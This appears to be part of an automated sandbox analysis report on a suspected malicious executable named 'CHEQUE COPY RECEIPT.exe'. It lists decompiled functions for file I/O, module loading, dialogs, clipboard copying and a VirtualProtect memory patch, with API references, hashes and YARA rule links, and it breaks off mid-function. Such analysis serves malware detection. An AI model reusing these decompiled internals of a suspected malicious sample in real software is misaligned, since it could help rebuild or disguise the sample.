Instruction Fuzzy Hash: C7110832108141EBDB307FA54D409BF37B49A92314B28457FE591B22E3D63C4942962E

Uniqueness

Uniqueness Score: -1.00%

Function 004031B7, Relevance: 3.1, APIs: 2, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E004031B7(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
				long _v8;
				long _t21;
				long _t22;
				void* _t24;
				long _t26;
				int _t27;
				long _t28;
				void* _t30;
				long _t31;
				long _t32;
				long _t36;

				_t21 = _a4;
				if(_t21 >= 0) {
					_t32 = _t21 +  *0x42f4b8;
					 *0x429464 = _t32;
					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
				}
				_t22 = E004032BF(4);
				if(_t22 >= 0) {
					_t24 = E00405E5E( *0x40a01c,  &_a4, 4); // executed
					if(_t24 == 0) {
						L18:
						_push(0xfffffffd);
						goto L19;
					} else {
						 *0x429464 =  *0x429464 + 4;
						_t36 = E004032BF(_a4);
						if(_t36 < 0) {
							L21:
							_t22 = _t36;
						} else {
							if(_a12 != 0) {
								_t26 = _a4;
								if(_t26 >= _a16) {
									_t26 = _a16;
								}
								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
								if(_t27 != 0) {
									_t36 = _v8;
									 *0x429464 =  *0x429464 + _t36;
									goto L21;
								} else {
									goto L18;
								}
							} else {
								if(_a4 <= 0) {
									goto L21;
								} else {
									while(1) {
										_t28 = _a4;
										if(_a4 >= 0x4000) {
											_t28 = 0x4000;
										}
										_v8 = _t28;
										if(E00405E5E( *0x40a01c, 0x41d460, _t28) == 0) {
											goto L18;
										}
										_t30 = E00405E8D(_a8, 0x41d460, _v8); // executed
										if(_t30 == 0) {
											_push(0xfffffffe);
											L19:
											_pop(_t22);
										} else {
											_t31 = _v8;
											_a4 = _a4 - _t31;
											 *0x429464 =  *0x429464 + _t31;
											_t36 = _t36 + _t31;
											if(_a4 > 0) {
												continue;
											} else {
												goto L21;
											}
										}
										goto L22;
									}
									goto L18;
								}
							}
						}
					}
				}
				L22:
				return _t22;
			}

0x004031bb
0x004031c4
0x004031cd
0x004031d1
0x004031dc
0x004031dc
0x004031e4
0x004031eb
0x004031fd
0x00403204
0x004032a9
0x004032a9
0x00000000
0x0040320a
0x0040320d
0x00403219
0x0040321d
0x004032b7
0x004032b7
0x00403223
0x00403226
0x00403285
0x0040328b
0x0040328d
0x0040328d
0x0040329f
0x004032a7
0x004032ae
0x004032b1
0x00000000
0x00000000
0x00000000
0x00000000
0x00403228
0x0040322b
0x00000000
0x00403231
0x00403236
0x0040323d
0x00403240
0x00403242
0x00403242
0x0040324f
0x00403259
0x00000000
0x00000000
0x00403262
0x00403269
0x00403281
0x004032ab
0x004032ab
0x0040326b
0x0040326b
0x0040326e
0x00403271
0x00403277
0x0040327d
0x00000000
0x0040327f
0x00000000
0x0040327f
0x0040327d
0x00000000
0x00403269
0x00000000
0x00403236
0x0040322b
0x00403226
0x0040321d
0x00403204
0x004032b9
0x004032bc

APIs

SetFilePointer.KERNEL32(0040A130,00000000,00000000,00000000,00000000,?,?,00403165,000000FF,00000000,00000000,0040A130,?), ref: 004031DC

Memory Dump Source

Source File: 00000000.00000002.240587109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.240583232.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240593870.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240597305.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240605351.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240610935.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240616562.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240619861.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 895b742663fe89ff2a238797a908e629badaab513ccad9f8b1a037716250395c
Instruction ID: f7a06b24e1bdd84e59f3f5cc49a67b6726d22d07d12c3136825aaea33ef0281b
Opcode Fuzzy Hash: 895b742663fe89ff2a238797a908e629badaab513ccad9f8b1a037716250395c
Instruction Fuzzy Hash: 91318D70200218EFDB109F95DD44A9A3BACEB04759F1044BEF905E61A0D3389E51DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x42f490;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42ec2c =  *0x42ec2c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42ec2c, 0x7530,  *0x42ec14), 0);
					}
				}
				return 0;
			}

0x0040138a
0x004013fa
0x0040139b
0x004013a0
0x00000000
0x00000000
0x004013a2
0x004013a3
0x004013ad
0x00000000
0x00401404
0x004013b0
0x004013b7
0x004013bd
0x004013be
0x004013c0
0x004013c2
0x004013b9
0x004013b9
0x004013ba
0x004013ba
0x004013c9
0x004013cb
0x004013f4
0x004013f4
0x004013c9
0x00000000

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageA.USER32 ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.240587109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.240583232.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240593870.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240597305.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240605351.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240610935.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240616562.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240619861.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 4efff27b407571731b33070943e5e1db077ec5294c94e6701788801526c55692
Instruction ID: 4ffa91c62993149d5f3561e9fd219417dede2ec5d116c30815b8555db40bf4f7
Opcode Fuzzy Hash: 4efff27b407571731b33070943e5e1db077ec5294c94e6701788801526c55692
Instruction Fuzzy Hash: 480121317242109BE7184B7A8D04B6A32A8E710318F10853AF841F61F1DA789C028B4C

Uniqueness

Uniqueness Score: -1.00%

Function 00406656, Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406656(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a258);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a258));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a25c));
				}
				_t5 = E004065E8(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}

0x0040665e
0x00406661
0x00406668
0x00406670
0x0040667c
0x00000000
0x00406683
0x00406673
0x0040667a
0x00000000
0x0040668b
0x00000000

APIs

GetModuleHandleA.KERNEL32(?,?,?,004034F9,0000000B), ref: 00406668
GetProcAddress.KERNEL32(00000000,?), ref: 00406683

Part of subcall function 004065E8: GetSystemDirectoryA.KERNEL32 ref: 004065FF
Part of subcall function 004065E8: wsprintfA.USER32 ref: 00406638
Part of subcall function 004065E8: LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 0040664C

Memory Dump Source

Source File: 00000000.00000002.240587109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.240583232.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240593870.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240597305.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240605351.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240610935.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240616562.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240619861.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 2284c13bb0467c230d08af9fe6f3031970f5259716d95ff003564f382569e38e
Instruction ID: a5acf963d4dc7277efada4342fe0793da34265ba7e3dd7efcecf40f1b2e2af73
Opcode Fuzzy Hash: 2284c13bb0467c230d08af9fe6f3031970f5259716d95ff003564f382569e38e
Instruction Fuzzy Hash: 48E086326042106AD6106B705E0497773A89F847103034D3EF94AF2140D739DC31966D

Uniqueness

Uniqueness Score: -1.00%

Function 00405DE6, Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00405DE6(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x00405dea
0x00405df7
0x00405e0c
0x00405e12

APIs

GetFileAttributesA.KERNEL32(00000003,00402F34,C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe,80000000,00000003), ref: 00405DEA
CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E0C

Memory Dump Source

Source File: 00000000.00000002.240587109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.240583232.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240593870.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240597305.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240605351.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240610935.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240616562.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240619861.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: f7726857ad0760fd27b8592a290aaff25a5a689f9fd17e1a71efc27c39f42f7d
Instruction ID: c1cd633b288b309c16b37b55694bd397a2d2f3fd27c3ea135bedd35eac3c4d3c
Opcode Fuzzy Hash: f7726857ad0760fd27b8592a290aaff25a5a689f9fd17e1a71efc27c39f42f7d
Instruction Fuzzy Hash: D9D09E31254602AFEF0D8F20DE16F2E7AA2EB84B00F11952CB682944E2DA715819AB19

Uniqueness

Uniqueness Score: -1.00%

Function 00405DC1, Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405DC1(CHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesA(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}

0x00405dc6
0x00405dcc
0x00405dd1
0x00405dda
0x00405dda
0x00405de3

APIs

GetFileAttributesA.KERNEL32(?,?,004059D9,?,?,00000000,00405BBC,?,?,?,?), ref: 00405DC6
SetFileAttributesA.KERNEL32(?,00000000), ref: 00405DDA

Memory Dump Source

Source File: 00000000.00000002.240587109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.240583232.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240593870.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240597305.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240605351.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240610935.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240616562.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240619861.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
Instruction ID: cf7f7f764d64860b039e5252603fd5f93999e207008e06c25ada038bd68c9de4
Opcode Fuzzy Hash: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
Instruction Fuzzy Hash: 16D0C976504421AFC2112728AE0C89BBB55DB542B1702CA36FDA5A26B2DB304C569A98

Uniqueness

Uniqueness Score: -1.00%

Function 004058B7, Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004058B7(CHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryA(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}

0x004058bd
0x004058c5
0x00000000
0x004058cb
0x00000000

APIs

CreateDirectoryA.KERNEL32(?,00000000,00403479,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 004058BD
GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 004058CB

Memory Dump Source

Source File: 00000000.00000002.240587109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.240583232.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240593870.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240597305.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240605351.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240610935.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240616562.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240619861.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 1ac3f182099991a074ef026cd112de1bb624e535cee62a6747cbed0a6cbac083
Instruction ID: 533fd4e2b3ea02dfd4e86ffada44851bb532735a7b96714f173b1300ab50f423
Opcode Fuzzy Hash: 1ac3f182099991a074ef026cd112de1bb624e535cee62a6747cbed0a6cbac083
Instruction Fuzzy Hash: 53C04C31214A019BE6506B319F09B177BA4AF50741F118439678AF01A1DB34846ADA6D

Uniqueness

Uniqueness Score: -1.00%

Function 00405E5E, Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405E5E(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x00405e62
0x00405e72
0x00405e7a
0x00000000
0x00405e81
0x00000000
0x00405e83

APIs

ReadFile.KERNEL32(0040A130,00000000,00000000,00000000,00000000,0041D460,00415460,0040343B,0040A130,0040A130,0040333F,0041D460,00004000,?,00000000,004031E9), ref: 00405E72

Memory Dump Source

Source File: 00000000.00000002.240587109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.240583232.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240593870.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240597305.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240605351.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240610935.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240616562.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240619861.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 416aeb435aa013431afb1a9c1c8b913c8d53da26c76a00aa22b400e2b7bce1d1
Instruction ID: 7c3f96e10be73f403a44b868b48459b61dea37020128cbb38d3373314b5f95ad
Opcode Fuzzy Hash: 416aeb435aa013431afb1a9c1c8b913c8d53da26c76a00aa22b400e2b7bce1d1
Instruction Fuzzy Hash: 79E0B63221465AAFDF509F95DC00AEB7B6CEB15260F004836BE59E2190D631EA21DAE8

Uniqueness

Uniqueness Score: -1.00%

Function 00405E8D, Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405E8D(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x00405e91
0x00405ea1
0x00405ea9
0x00000000
0x00405eb0
0x00000000
0x00405eb2

APIs

WriteFile.KERNEL32(0040A130,00000000,00000000,00000000,00000000,00415FF3,00415460,004033BF,00415460,00415FF3,0040B8A0,0041D460,00004000,?,00000000,004031E9), ref: 00405EA1

Memory Dump Source

Source File: 00000000.00000002.240587109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.240583232.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240593870.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240597305.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240605351.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240610935.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240616562.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240619861.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction ID: 65ef4e0bd98581bd1f6bd632b42787c8420692956f3b06be75fa4a484c2a9a78
Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction Fuzzy Hash: FFE08C3220125AABEF119F60CC00AEB3B6CFB04361F004433FAA4E3140E230E9208BE4

Uniqueness

Uniqueness Score: -1.00%

Function 73CA2921, Relevance: 1.5, APIs: 1, Instructions: 21
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x73ca4038 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x73ca404c, 4, 0x40, 0x73ca403c); // executed
					 *0x73ca404c = 0xc2;
					 *0x73ca403c = 0;
					 *0x73ca4044 = 0;
					 *0x73ca4058 = 0;
					 *0x73ca4048 = 0;
					 *0x73ca4040 = 0;
					 *0x73ca4050 = 0;
					 *0x73ca404e = 0;
				}
				return 1;
			}

0x73ca292a
0x73ca292f
0x73ca293f
0x73ca2947
0x73ca294e
0x73ca2953
0x73ca2958
0x73ca295d
0x73ca2962
0x73ca2967
0x73ca296c
0x73ca296c
0x73ca2974

APIs

VirtualProtect.KERNEL32(73CA404C,00000004,00000040,73CA403C), ref: 73CA293F

Memory Dump Source

Source File: 00000000.00000002.241965832.0000000073CA1000.00000020.00020000.sdmp, Offset: 73CA0000, based on PE: true

Associated: 00000000.00000002.241959915.0000000073CA0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.241972886.0000000073CA3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.241983655.0000000073CA5000.00000002.00020000.sdmp Download File

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 04c56d4e33416acde8eb83b2e2d7161487dc8d9c8feafbaee4fa644fbccd72e0
Instruction ID: 72d77cfaba1189d3dc943d6d5f9b7f70550d4f6eac9da508619501046d2b7485
Opcode Fuzzy Hash: 04c56d4e33416acde8eb83b2e2d7161487dc8d9c8feafbaee4fa644fbccd72e0
Instruction Fuzzy Hash: 0AF0A5B35082E1DEC3A0EF7A84847063FE1A318354B22852AE59CDF341E3345844BF11

Uniqueness

Uniqueness Score: -1.00%

Function 0040343E, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040343E(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}

0x0040344c
0x00403452

APIs

SetFilePointer.KERNEL32(00000000,00000000,00000000,0040313E,?), ref: 0040344C

Memory Dump Source

Source File: 00000000.00000002.240587109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.240583232.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240593870.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240597305.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240605351.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240610935.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240616562.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240619861.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
Instruction ID: eadcf480fe67690f272c505b4903882a1233053cb438a9b9796e5ea94341b5dd
Opcode Fuzzy Hash: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
Instruction Fuzzy Hash: 25B09231140200AADA215F409E09F057B21AB94700F208424B244280F086712025EA0D

Uniqueness

Uniqueness Score: -1.00%

Function 00405C10, Relevance: 1.3, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405C10(CHAR* _a4, intOrPtr _a8) {
				CHAR* _t3;
				char _t4;

				_t3 = _a4;
				while(1) {
					_t4 =  *_t3;
					if(_t4 == 0) {
						break;
					}
					if(_t4 != _a8) {
						_t3 = CharNextA(_t3); // executed
						continue;
					}
					break;
				}
				return _t3;
			}

0x00405c10
0x00405c23
0x00405c23
0x00405c27
0x00000000
0x00000000
0x00405c1a
0x00405c1d
0x00000000
0x00405c1d
0x00000000
0x00405c1a
0x00405c29

APIs

CharNextA.USER32(?,00403593,"C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe" ,00000020,"C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe" ,00000000,?,00000007,00000009,0000000B), ref: 00405C1D

Memory Dump Source

Source File: 00000000.00000002.240587109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.240583232.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240593870.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240597305.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240605351.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240610935.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240616562.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240619861.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext
String ID:
API String ID: 3213498283-0
Opcode ID: 1083c57b7f4745178c71a6651c3ca9c923e8efe26efc9521b350556c87d1c9f6
Instruction ID: a823865110b2f25737836ca410d0586f0b32f660d12bad0ae163707f0ebdfa97
Opcode Fuzzy Hash: 1083c57b7f4745178c71a6651c3ca9c923e8efe26efc9521b350556c87d1c9f6
Instruction Fuzzy Hash: 2FC0807440CF8057E510571051244677FE0EAD2700F248C5AF0C063150C13858C08B29

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004054B2, Relevance: 54.3, APIs: 36, Instructions: 282
windowclipboardmemoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E004054B2(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				struct tagRECT _v24;
				void* _v32;
				signed int _v36;
				int _v40;
				int _v44;
				signed int _v48;
				int _v52;
				void* _v56;
				void* _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t87;
				struct HWND__* _t89;
				long _t90;
				int _t95;
				int _t96;
				long _t99;
				void* _t102;
				intOrPtr _t124;
				struct HWND__* _t128;
				int _t150;
				int _t153;
				long _t157;
				struct HWND__* _t161;
				struct HMENU__* _t163;
				long _t165;
				void* _t166;
				char* _t167;
				char* _t168;
				int _t169;

				_t87 =  *0x42ec24; // 0x0
				_t157 = _a8;
				_t150 = 0;
				_v8 = _t87;
				if(_t157 != 0x110) {
					__eflags = _t157 - 0x405;
					if(_t157 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00405446, GetDlgItem(_a4, 0x3ec), 0,  &_a8));
					}
					__eflags = _t157 - 0x111;
					if(_t157 != 0x111) {
						L17:
						__eflags = _t157 - 0x404;
						if(_t157 != 0x404) {
							L25:
							__eflags = _t157 - 0x7b;
							if(_t157 != 0x7b) {
								goto L20;
							}
							_t89 = _v8;
							__eflags = _a12 - _t89;
							if(_a12 != _t89) {
								goto L20;
							}
							_t90 = SendMessageA(_t89, 0x1004, _t150, _t150);
							__eflags = _t90 - _t150;
							_a12 = _t90;
							if(_t90 <= _t150) {
								L36:
								return 0;
							}
							_t163 = CreatePopupMenu();
							AppendMenuA(_t163, _t150, 1, E004062E0(_t150, _t157, _t163, _t150, 0xffffffe1));
							_t95 = _a16;
							__eflags = _a16 - 0xffffffff;
							_t153 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v24);
								_t95 = _v24.left;
								_t153 = _v24.top;
							}
							_t96 = TrackPopupMenu(_t163, 0x180, _t95, _t153, _t150, _a4, _t150);
							__eflags = _t96 - 1;
							if(_t96 == 1) {
								_t165 = 1;
								__eflags = 1;
								_v56 = _t150;
								_v44 = 0x42a8b8;
								_v40 = 0x1000;
								_a4 = _a12;
								do {
									_a4 = _a4 - 1;
									_t99 = SendMessageA(_v8, 0x102d, _a4,  &_v64);
									__eflags = _a4 - _t150;
									_t165 = _t165 + _t99 + 2;
								} while (_a4 != _t150);
								OpenClipboard(_t150);
								EmptyClipboard();
								_t102 = GlobalAlloc(0x42, _t165);
								_a4 = _t102;
								_t166 = GlobalLock(_t102);
								do {
									_v44 = _t166;
									_t167 = _t166 + SendMessageA(_v8, 0x102d, _t150,  &_v64);
									 *_t167 = 0xd;
									_t168 = _t167 + 1;
									 *_t168 = 0xa;
									_t166 = _t168 + 1;
									_t150 = _t150 + 1;
									__eflags = _t150 - _a12;
								} while (_t150 < _a12);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						__eflags =  *0x42ec0c - _t150; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x42f448, 8);
							__eflags =  *0x42f4ec - _t150;
							if( *0x42f4ec == _t150) {
								E00405374( *((intOrPtr*)( *0x42a090 + 0x34)), _t150);
							}
							E004042AA(1);
							goto L25;
						}
						 *0x429c88 = 2;
						E004042AA(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E00404338(_t157, _a12, _a16);
						}
						ShowWindow( *0x42ec10, _t150);
						ShowWindow(_v8, 8);
						E00404306(_v8);
						goto L17;
					}
				}
				_v48 = _v48 | 0xffffffff;
				_v36 = _v36 | 0xffffffff;
				_t169 = 2;
				_v56 = _t169;
				_v52 = 0;
				_v44 = 0;
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				_t124 =  *0x42f454;
				_a12 =  *((intOrPtr*)(_t124 + 0x5c));
				_a8 =  *((intOrPtr*)(_t124 + 0x60));
				 *0x42ec10 = GetDlgItem(_a4, 0x403);
				 *0x42ec08 = GetDlgItem(_a4, 0x3ee);
				_t128 = GetDlgItem(_a4, 0x3f8);
				 *0x42ec24 = _t128;
				_v8 = _t128;
				E00404306( *0x42ec10);
				 *0x42ec14 = E00404BF7(4);
				 *0x42ec2c = 0;
				GetClientRect(_v8,  &_v24);
				_v48 = _v24.right - GetSystemMetrics(_t169);
				SendMessageA(_v8, 0x101b, 0,  &_v56);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a12 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a12);
					SendMessageA(_v8, 0x1026, 0, _a12);
				}
				if(_a8 >= _t150) {
					SendMessageA(_v8, 0x1024, _t150, _a8);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E004042D1(_a4);
				if(( *0x42f45c & 0x00000003) != 0) {
					ShowWindow( *0x42ec10, _t150);
					if(( *0x42f45c & 0x00000002) != 0) {
						 *0x42ec10 = _t150;
					} else {
						ShowWindow(_v8, 8);
					}
					E00404306( *0x42ec08);
				}
